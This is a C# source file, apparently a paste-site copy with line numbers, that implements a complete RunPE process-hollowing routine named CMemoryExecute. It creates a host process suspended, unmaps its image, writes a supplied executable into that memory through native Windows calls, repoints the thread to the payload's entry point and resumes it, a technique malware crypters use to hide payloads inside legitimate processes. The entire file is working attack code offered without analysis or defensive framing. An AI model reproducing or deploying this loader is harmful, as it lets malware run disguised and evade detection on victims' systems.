using System;using System.Runtime.InteropServices;public static unsafe cla

1. using System;
2. using System.Runtime.InteropServices;
3.  
4. public static unsafe class CMemoryExecute
5. {
6.     public static bool Run(byte[] exeBuffer, string hostProcess)
7.     {
8.         var IMAGE_SECTION_HEADER = new byte[0x28]; // pish
9.         var IMAGE_NT_HEADERS = new byte[0xf8]; // pinh
10.         var IMAGE_DOS_HEADER = new byte[0x40]; // pidh
11.         var PROCESS_INFO = new int[0x4]; // pi
12.         var CONTEXT = new byte[0x2cc]; // ctx
13.  
14.         byte* pish;
15.         fixed (byte* p = &IMAGE_SECTION_HEADER[0])
16.             pish = p;
17.  
18.         byte* pinh;
19.         fixed (byte* p = &IMAGE_NT_HEADERS[0])
20.             pinh = p;
21.  
22.         byte* pidh;
23.         fixed (byte* p = &IMAGE_DOS_HEADER[0])
24.             pidh = p;
25.  
26.         byte* ctx;
27.         fixed (byte* p = &CONTEXT[0])
28.             ctx = p;
29.  
30.         // Set the flag.
31.         *(uint*)(ctx + 0x0 /* ContextFlags */) = CONTEXT_FULL;
32.  
33.         // Get the DOS header of the EXE.
34.         Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length);
35.  
36.         /* Sanity check:  See if we have MZ header. */
37.         if (*(ushort*)(pidh + 0x0 /* e_magic */) != IMAGE_DOS_SIGNATURE)
38.             return false;
39.  
40.         var e_lfanew = *(int*)(pidh + 0x3c);
41.  
42.         // Get the NT header of the EXE.
43.         Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length);
44.  
45.         /* Sanity check: See if we have PE00 header. */
46.         if (*(uint*)(pinh + 0x0 /* Signature */) != IMAGE_NT_SIGNATURE)
47.             return false;
48.  
49.         if (!CreateProcess(null, hostProcess, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED, IntPtr.Zero, null, new byte[0x44], PROCESS_INFO))
50.             return false;
51.  
52.         var ImageBase = new IntPtr(*(int*)(pinh + 0x34));
53.         NtUnmapViewOfSection((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase);
54.         if (VirtualAllocEx((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, *(uint*)(pinh + 0x50 /* SizeOfImage */), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == IntPtr.Zero)
55.             Run(exeBuffer, hostProcess); // Memory allocation failed; try again (this can happen in low memory situations)
56.  
57.         fixed (byte* p = &exeBuffer[0])
58.             NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, (IntPtr)p, *(uint*)(pinh + 84 /* SizeOfHeaders */), IntPtr.Zero);
59.  
60.         for (ushort i = 0; i < *(ushort*)(pinh + 0x6 /* NumberOfSections */); i++)
61.         {
62.             Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length);
63.             fixed (byte* p = &exeBuffer[*(uint*)(pish + 0x14 /* PointerToRawData */)])
64.                 NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)((int)ImageBase + *(uint*)(pish + 0xc /* VirtualAddress */)), (IntPtr)p, *(uint*)(pish + 0x10 /* SizeOfRawData */), IntPtr.Zero);
65.         }
66.  
67.         NtGetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
68.         NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)(*(uint*)(ctx + 0xAC /* ecx */)), ImageBase, 0x4, IntPtr.Zero);
69.         *(uint*)(ctx + 0xB0 /* eax */) = (uint)ImageBase + *(uint*)(pinh + 0x28 /* AddressOfEntryPoint */);
70.         NtSetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
71.         NtResumeThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, IntPtr.Zero);
72.  
73.         return true;
74.     }
75.  
76.     #region WinNT Definitions
77.  
78.     private const uint CONTEXT_FULL = 0x10007;
79.     private const int CREATE_SUSPENDED = 0x4;
80.     private const int MEM_COMMIT = 0x1000;
81.     private const int MEM_RESERVE = 0x2000;
82.     private const int PAGE_EXECUTE_READWRITE = 0x40;
83.     private const ushort IMAGE_DOS_SIGNATURE = 0x5A4D; // MZ
84.     private const uint IMAGE_NT_SIGNATURE = 0x00004550; // PE00
85.  
86.     #region WinAPI
87.     [DllImport("kernel32.dll", SetLastError = true)]
88.     private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, byte[] lpStartupInfo, int[] lpProcessInfo);
89.  
90.     [DllImport("kernel32.dll", SetLastError = true)]
91.     private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
92.  
93.     [DllImport("ntdll.dll", SetLastError = true)]
94.     private static extern uint NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);
95.  
96.     [DllImport("ntdll.dll", SetLastError = true)]
97.     private static extern int NtWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, IntPtr lpNumberOfBytesWritten);
98.  
99.     [DllImport("ntdll.dll", SetLastError = true)]
100.     private static extern int NtGetContextThread(IntPtr hThread, IntPtr lpContext);
101.  
102.     [DllImport("ntdll.dll", SetLastError = true)]
103.     private static extern int NtSetContextThread(IntPtr hThread, IntPtr lpContext);
104.  
105.     [DllImport("ntdll.dll", SetLastError = true)]
106.     private static extern uint NtResumeThread(IntPtr hThread, IntPtr SuspendCount);
107.     #endregion
108.  
109.     #endregion
110. }